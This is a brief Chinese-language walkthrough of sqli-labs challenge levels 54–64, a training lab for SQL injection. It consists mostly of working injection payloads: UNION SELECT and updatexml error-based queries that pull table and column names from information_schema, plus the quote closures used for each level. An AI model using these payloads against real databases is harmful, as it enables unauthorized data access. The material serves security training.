sqli-labs 54-65(CHALLANGES)
challenges
less54
数据库为CHALLENGES,且仅有十次尝试机会,十次以后会随机生成一个新的表名和密码-
1'order by 3--+
-
-1'union select 1,2,3 --+
-
-1'union select 1,2, database() --+
-
-1'union select 1,2, group_concat(table_name)from information_schema.tables where table_schema='CHALLENGES' --+
less55
用?id=1)包裹,同less54
less56
用?id=1’)包裹
less57
用?id=1“包裹
less58
变成了只有五次机会用?id=1“包裹
-
表名:-1'and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='CHALLENGES')),1) --+
-
字段名:1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from Information_schema.columns where table_name='lkvyhzvvj3' )),1)--+
less59
无闭合 Less-58
less60
用?id=1")闭合
less61
用?id=1'))闭合less62
给了一百多次机会还没有回显 显然是要用布尔盲注
布尔盲注 less-9
less63
用?id=1'闭合
less64
用?id=1))闭合
